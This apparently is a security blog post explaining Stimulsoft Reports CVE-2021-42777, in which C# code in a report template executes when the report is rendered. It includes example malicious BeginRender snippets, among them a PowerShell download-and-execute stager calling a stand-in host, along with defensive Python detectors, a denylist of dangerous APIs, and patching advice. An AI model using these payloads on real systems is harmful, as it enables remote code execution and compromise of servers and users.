Stimulsoft Reports is a widely used reporting tool for .NET, often embedded in enterprise web and desktop applications. But if you're still running version 2013.1.1600 (or a similarly outdated build), your application may be seriously at risk from CVE-2021-42777. The vulnerability allows remote code execution (RCE) by abusing the report compilation feature: any C#/VB.NET embedded in a report template is compiled and run by whatever process renders it. In this post, I'll break down how the exploit works, what the code looks like, and how you can protect your system.

What’s the Issue?

Stimulsoft Reports' "Compilation Mode" lets report authors write C#/VB.NET for custom expressions and event handlers. Useful, but dangerous: the script is compiled into an assembly and executed, with no sandbox, by whatever process renders the report (the application server or the client viewing it), under that process's own identity. A report template is therefore not data; it is source code that runs with the renderer's privileges.

Original vendor advisory:  
- Stimulsoft Changelog 2021  
- NVD CVE Entry

Exploit Overview

An attacker can create or modify a Stimulsoft report file (.mrt, .mrz, etc.) to include malicious C# code. When the report is rendered, the payload executes, for example by calling System.Diagnostics.Process.Start to spawn a process such as cmd.exe or PowerShell. No memory corruption or separate bug is involved; the feature itself is the exploit primitive, and whoever can get a report file in front of a renderer controls what runs.

Typical Attack Paths

- Web Reporting: Upload or push a crafted report. When staff or another user views it, the exploit runs on whichever side renders it (the web server for server-side rendering, the browser-side viewer host for client rendering).

- Desktop Viewer: Trick a user into opening an evil .mrt file in the designer or viewer; the code runs as that user.

- Server-Side Generation: If reports are compiled server-side, *every* render request for a tampered template triggers code execution with the service account's privileges, with no user interaction at all.

Example: Malicious Report Snippet

Inside the report template, scripts can be added to events like BeginRender or bound to custom buttons, etc.

Here’s a *weaponized* snippet you might see in a manipulated Stimulsoft report component’s script area:

using System.Diagnostics;

public void BeginRender()
{
    // DANGEROUS: Will run any process with app user rights
    Process.Start("calc.exe"); // Spawns Calculator - proof of concept
    // For real attacks, replace with something nastier: Downloaders, reverse shells, etc.
}

Or a PowerShell download-and-execute stager on Windows (the same technique drops a reverse shell; only the fetched binary changes):

using System.Diagnostics;

public void BeginRender()
{
    Process.Start("powershell.exe", "-c \"Invoke-WebRequest http://evilserver.com/payload.exe -OutFile C:\\temp\\bad.exe; Start-Process C:\\temp\\bad.exe\"");
}

You could insert this via the Stimulsoft Designer (Script tab) or directly by editing the XML in the .mrt file.

Trigger Execution:

- When any user (or the server itself) renders the report in any Stimulsoft-powered viewer, the payload runs immediately with whatever rights the rendering process has: the IIS application-pool or service account for web reporting, or the logged-on user (often a local admin) for the desktop viewer. Nothing prompts the user; rendering the report is the trigger.
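If you cannot patch immediately, a cheap detection is to watch for the report host spawning anything it should not. Here is an added example (my own code, not from the original post or from Stimulsoft) that runs that logic over constructed Sysmon-style process-creation records. The report-host process names, the allowlist of expected children, and the flattened record format are assumptions to adapt to your environment; the sample lines are made up for the demo, and only the first one mirrors the stager above.

```python
import ntpath

# Constructed Sysmon-style process-creation (Event ID 1) records, flattened
# to key=value fields for this example. Made-up lines, not real telemetry.
SAMPLE_EVENTS = [
    "EventID=1|ParentImage=C:\\Windows\\System32\\inetsrv\\w3wp.exe"
    "|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|CommandLine=powershell.exe -c \"Invoke-WebRequest http://evilserver.com/payload.exe -OutFile C:\\temp\\bad.exe\"",
    "EventID=1|ParentImage=C:\\Windows\\System32\\inetsrv\\w3wp.exe"
    "|Image=C:\\Windows\\System32\\conhost.exe|CommandLine=conhost.exe 0xffffffff",
    "EventID=1|ParentImage=C:\\Windows\\explorer.exe"
    "|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|CommandLine=powershell.exe -NoProfile",
    "EventID=1|ParentImage=C:\\Program Files\\Stimulsoft\\Designer.exe"
    "|Image=C:\\Windows\\System32\\calc.exe|CommandLine=calc.exe",
]

# Processes that host Stimulsoft report rendering. Assumption: adjust to the
# executables that actually render reports in your environment.
REPORT_HOSTS = {"w3wp.exe", "designer.exe", "viewer.exe"}

# Children a report host may legitimately spawn. csc.exe/vbc.exe are the
# .NET Framework compilers that Compilation Mode itself invokes, so they are
# expected whenever that mode is on; conhost/werfault are OS noise.
EXPECTED_CHILDREN = {"csc.exe", "vbc.exe", "conhost.exe", "werfault.exe"}

# Living-off-the-land binaries a report should never launch.
LOLBINS = {"cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe",
           "rundll32.exe", "regsvr32.exe", "certutil.exe", "wscript.exe",
           "cscript.exe", "bitsadmin.exe"}


def parse_event(line: str) -> dict:
    """Split a flattened 'k=v|k=v' record into a dict (value may contain '=')."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key] = value
    return fields


def classify(event: dict):
    """Return (severity, child, command line), or None if nothing to flag.

    Any unexpected child of a report host is suspicious (medium); a known
    LOLBIN child is the exploit pattern from the post (high).
    """
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    child = ntpath.basename(event.get("Image", "")).lower()
    if parent not in REPORT_HOSTS or child in EXPECTED_CHILDREN:
        return None
    severity = "high" if child in LOLBINS else "medium"
    return severity, child, event.get("CommandLine", "")


def detect(lines):
    """Run classify() over every record and collect the alerts in order."""
    alerts = []
    for line in lines:
        hit = classify(parse_event(line))
        if hit:
            alerts.append(hit)
    return alerts


if __name__ == "__main__":
    for severity, child, cmd in detect(SAMPLE_EVENTS):
        print(f"[{severity.upper()}] report host spawned {child}: {cmd}")
```

Against the sample records this flags the w3wp.exe to powershell.exe launch as high and Designer.exe to calc.exe as medium, while ignoring conhost.exe under w3wp.exe and PowerShell started from Explorer. Note that csc.exe under w3wp.exe is deliberately not an alert: on .NET Framework that is Compilation Mode doing its job, which makes it a useful inventory signal (which servers still compile report scripts?) rather than an incident.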

Sneaking the payload into the report XML (ReportScript node)

<ReportScript>
  <![CDATA[
    using System.Diagnostics;
    public void BeginRender() {
        Process.Start("calc.exe");
    }
  ]]>
</ReportScript>
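For user-submitted reports, the other practical control is to refuse templates that carry script at all, or at least ones that reach into process, file, network or reflection APIs, before they get anywhere near a renderer. The following is an added example (my code, not Stimulsoft's and not from the original post) that parses an .mrt as XML and scans its script-bearing elements for such calls. Assumptions: it treats any element whose name contains "Script" as code, which covers the ReportScript node above but may need adjusting since .mrt layouts differ between versions; the two sample reports are constructed for the demo; and the API list is a starting point, not a complete denylist.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample .mrt content (not real reports from the post). The
# <ReportScript> CDATA block mirrors the weaponized snippet above.
MALICIOUS_MRT = """<?xml version="1.0" encoding="utf-8"?>
<StiSerializer version="1.02" type="Net" application="StiReport">
  <ReportName>Invoice</ReportName>
  <ReportScript><![CDATA[
    using System.Diagnostics;
    public void BeginRender() {
        Process.Start("calc.exe");
    }
  ]]></ReportScript>
</StiSerializer>
"""

BENIGN_MRT = """<?xml version="1.0" encoding="utf-8"?>
<StiSerializer version="1.02" type="Net" application="StiReport">
  <ReportName>Invoice</ReportName>
  <ReportScript><![CDATA[
    public void BeginRender() {
        Text1.Text = "Total: " + Totals.Sum;
    }
  ]]></ReportScript>
</StiSerializer>
"""

# APIs that have no business in a report expression. Matching on the token
# catches both the using-directive form and fully qualified calls.
DANGEROUS = [
    r"\bSystem\.Diagnostics\b",
    r"\bProcess\.Start\b",
    r"\bSystem\.IO\b",
    r"\bSystem\.Reflection\b",
    r"\bAssembly\.Load\w*",
    r"\bSystem\.Net\b",
    r"\bWebClient\b",
    r"\bHttpClient\b",
    r"\bDllImport\b",
    r"\bMarshal\.",
]


def find_scripts(mrt_xml: str):
    """Yield (element tag, script text) for every script-bearing element.

    Assumption: code lives in elements whose name contains 'Script' (the
    ReportScript node shown above); tweak the test if your version differs.
    """
    root = ET.fromstring(mrt_xml.encode("utf-8"))
    for elem in root.iter():
        if "script" in elem.tag.lower() and elem.text and elem.text.strip():
            yield elem.tag, elem.text


def scan_report(mrt_xml: str):
    """Return a list of (element tag, matched token) for every hit."""
    findings = []
    for tag, code in find_scripts(mrt_xml):
        for pattern in DANGEROUS:
            for match in re.finditer(pattern, code):
                findings.append((tag, match.group(0)))
    return findings


def is_safe_to_accept(mrt_xml: str) -> bool:
    """Upload gate: accept only parseable reports with no flagged API use."""
    try:
        return not scan_report(mrt_xml)
    except ET.ParseError:
        return False  # unparseable upload: reject rather than guess


if __name__ == "__main__":
    for name, doc in (("malicious", MALICIOUS_MRT), ("benign", BENIGN_MRT)):
        print(name, "->", "ACCEPT" if is_safe_to_accept(doc) else "REJECT",
              scan_report(doc))
```

Treat this as a tripwire, not a security boundary: string concatenation, reflection by type name, or a `using` alias can dodge a regex, and a determined attacker will. The only real fix for untrusted templates is to never compile them (interpretation mode or no scripts at all); the scanner's job is to catch the obvious cases and to make "why does this invoice template import System.Diagnostics?" a question someone actually asks.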

Affected Versions

- Stimulsoft Reports 2013.1.1600 and earlier (the vendor confirms all older versions).

- Apps using "Compilation Mode" (not all Stimulsoft setups compile scripts server-side, but many legacy or "power user" features do). If reports are evaluated in interpretation mode only, the script is never compiled and this particular primitive does not apply.

Fix & Mitigation

Stimulsoft fixed this in later builds by restricting code execution and adding sandboxing.  
Read their official security notes for patches.

- Upgrade NOW: Use the most recent version of Stimulsoft Reports, ideally 2021.4 or newer.

- Disable Compilation Mode if possible, especially for user-submitted/untrusted reports, and run the renderer under a low-privilege service account so a compromised report does not inherit admin rights.

- Lock down who can upload or edit report templates, and treat any .mrt/.mrz from outside your team as untrusted code.

References & Read More

- CVE-2021-42777 – NIST
- Stimulsoft Release Notes
- Exploit-DB Example *(Sample)*

Final Word

If you use Stimulsoft Reports, treat report files as untrusted code—because that’s what they are. Always update and lock down upload/report editing permissions. Vulnerabilities like CVE-2021-42777 show how trusted reporting tools can become huge attack surfaces when left unpatched.

Timeline

Published on: 10/29/2022 17:15:00 UTC
Last modified on: 11/01/2022 18:41:00 UTC